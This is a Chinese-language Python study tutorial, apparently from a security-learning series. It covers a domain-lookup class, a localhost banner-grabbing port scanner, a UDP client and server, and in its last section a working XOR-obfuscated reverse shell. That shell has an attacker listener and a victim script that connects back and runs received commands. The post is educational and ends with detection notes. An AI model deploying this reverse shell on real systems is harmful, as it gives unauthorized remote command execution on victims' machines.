fb.python-study.1



0x01.python类

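# coding=utf-8
import os
import subprocess


class Domain:
    """A host name plus the port and scheme needed to build its URL.

    Attributes:
        domain: Host name, e.g. 'www.freebuf.com'.
        port: Port number; a string or an int is accepted.
        protocol: 'http' or 'https'.
    """

    def __init__(self, domain, port, protocol):
        self.domain = domain
        self.port = port
        self.protocol = protocol

    def URL(self):
        """Return '<protocol>://<domain>:<port>/'.

        Raises:
            ValueError: if protocol is neither 'http' nor 'https'. The
                original fell through both ``if`` tests and failed on an
                unbound local instead.
        """
        if self.protocol not in ('http', 'https'):
            raise ValueError("unsupported protocol: %r" % (self.protocol,))
        # str() lets callers pass the port as an int as well as a string.
        return self.protocol + '://' + self.domain + ':' + str(self.port) + '/'

    def lookup(self):
        """Resolve the domain with the system ``host`` utility.

        The output of ``host`` goes straight to stdout; nothing is returned.

        Raises:
            ValueError: if the host name is empty, contains whitespace or
                starts with '-'.
        """
        name = str(self.domain)
        # The name is handed to an external program. Building a shell string
        # (os.system("host " + name)) would let shell metacharacters in the
        # name run as commands, so pass an argv list instead, and refuse
        # names that ``host`` would parse as an option.
        if not name or name.startswith('-') or any(ch.isspace() for ch in name):
            raise ValueError("refusing to look up host name: %r" % (name,))
        try:
            subprocess.call(['host', name])
        except OSError:
            print("could not run the 'host' utility")


if __name__ == "__main__":
    domain = Domain('www.freebuf.com', '80', 'http')
    print(domain.URL())
    print(domain.port)
    print(domain.protocol)
    domain.lookup()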

Output:

root@kali:~/Desktop# python ./test.py
http://www.freebuf.com:80/
80
http
www.freebuf.com has address 123.151.180.21


environment: kali+py2.7.3


0x02 scan port

开启了本机的ssh,也就是22端口。一个简单的演示。

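# coding=utf-8
# Minimal TCP banner grabber (Python 2.7, as in the article): connect to each
# port, send one probe line and print whatever the service answers.
import socket

ports = [21, 22, 53, 80, 443, 445, 3389, 5050, 5678, 8080, 8081]
hosts = ['127.0.0.1']
timeout = 3  # seconds to wait on connect/send/recv for a single port

for host in hosts:
    for port in ports:
        s = socket.socket()
        # Without a timeout, recv() blocks indefinitely on a service that
        # accepts the connection but never sends anything back.
        s.settimeout(timeout)
        try:
            print("[+]Attempting to connect to " + host + ":" + str(port))
            s.connect((host, port))
            # The probe ends in a real newline; the original sent the two
            # characters '/n', which line-based services do not treat as
            # end of line.
            s.send('adsfsafdsfadfsadfasdfasdfas \n')
            banner = s.recv(1024)
            if banner:
                print("[+]" + host + ":" + str(port) + " open: \n" + banner)
        except socket.error:
            # Refused, unreachable or timed out: nothing to report for this
            # port. Only socket errors are swallowed, so Ctrl-C and genuine
            # bugs still surface (the original used a bare ``except``).
            pass
        finally:
            # Close on every path so failed probes do not leak descriptors.
            s.close()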
结果:
root@kali:~/Desktop# python ./scan.py
[+]Attempting to connect to 127.0.0.1:21
[+]Attempting to connect to 127.0.0.1:22
[+]127.0.0.1:22 open: 
SSH-2.0-OpenSSH_6.0p1 Debian-4+deb7u2
[+]Attempting to connect to 127.0.0.1:53
[+]Attempting to connect to 127.0.0.1:80
[+]Attempting to connect to 127.0.0.1:443
[+]Attempting to connect to 127.0.0.1:445
[+]Attempting to connect to 127.0.0.1:3389
[+]Attempting to connect to 127.0.0.1:5050
[+]Attempting to connect to 127.0.0.1:5678
[+]Attempting to connect to 127.0.0.1:8080
[+]Attempting to connect to 127.0.0.1:8081

这只是个示例程序,并不实用:如果不给socket设置超时,在扫描那些不能既recv又send的程序时,会卡在recv上。


0x03 Reverse Shell – 反向shell

一个简单的udp server-client.py

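# coding=utf-8
# Minimal UDP receiver (Python 2.7, as in the article): print every datagram
# that arrives on the port together with the sender's address.
import socket

# NOTE(review): an empty host binds every interface, so any machine that can
# reach this port can send to the demo; '127.0.0.1' is enough for the
# localhost client shown next to it.
host = ''
port = 1024
bufsize = 128  # recvfrom() returns at most this many bytes of a datagram
addr = (host, port)

udp_server = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
    udp_server.bind(addr)
    while True:
        print('waiting for message...')
        # Despite the message text below, nothing is sent back to the peer.
        data, peer = udp_server.recvfrom(bufsize)
        print('...received from and return to:' + str(peer) + ": " + data)
finally:
    # The loop only ends through an exception (e.g. Ctrl-C); the original
    # close() after the loop was unreachable.
    udp_server.close()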

# coding=utf-8
# Minimal UDP sender (Python 2.7, as in the article): every line typed at the
# prompt goes out as one datagram; an empty line ends the session.
import socket

host = 'localhost'
port = 1024
bufsize = 128  # defined for symmetry with the server; the client never reads
addr = (host, port)

udp_client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# iter() with a sentinel keeps prompting until raw_input() returns ''.
for data in iter(lambda: raw_input('>'), ''):
    udp_client.sendto(data, addr)
udp_client.close()

接下来是一个反向shell的演示程序。

attacker.py

#coding=utf-8import socket"""建立socket监听端口"""s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)s.bind(("0.0.0.0", 443))s.listen(2048)print "Listening on port 443... "#接受连接  得到肉鸡(client, (ip, port)) = s.accept()print " recived connection from : ", ipwhile True:    command = raw_input('~$ ')    encode = bytearray(command)    for i in range(len(encode)):        encode[i] ^= 0x41        client.send(encode)#send    en_data = client.recv(2048)#recv     decode = bytearray(en_data)    for i in range(len(decode)):        decode[i] ^= 0x41    print decodeclient.close()s.close()

shell.py

#!/usr/bin/pythonimport socket, subprocess, sysRHOST = sys.argv[1]RPORT = 443s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)s.connect((RHOST, RPORT))while True:    # receive XOR encoded data from network socket    data = s.recv(1024)    # XOR the data again with a '\x41' to get back to normal data    en_data = bytearray(data)    for i in range(len(en_data)):        en_data[i] ^= 0x41    # Execute the decode data as a command.    # The subprocess module is great because we can PIPE STDOUT/STDERR/STDIN to a variable    comm = subprocess.Popen(str(en_data), shell = True, stdout = subprocess.PIPE, stderr = subprocess.PIPE, stdin = subprocess.PIPE)    comm.wait()    STDOUT, STDERR = comm.communicate()       print STDERR    # Encode the output and send to RHOST    en_STDOUT= bytearray(STDOUT)    for i in range(len(en_STDOUT)):        en_STDOUT[i] ^= 0x41    s.send(en_STDOUT)s.close()

从中可以看出:攻击者在自己的机器上开启443端口,然后在受害者机器上运行shell.py,使受害机器连接到攻击者的机器上;同时使用subprocess模块执行由attacker发过来的命令,并将受害机器的命令回显发回到攻击者的机器上,相当于一个远程shell。它并不是最标准的交互式shell。(nc反弹拿shell)从防守角度看,0x41单字节异或只是混淆而不是加密,443端口上跑的也不是TLS,这类流量以及由python进程拉起的shell子进程都比较容易被检测到。






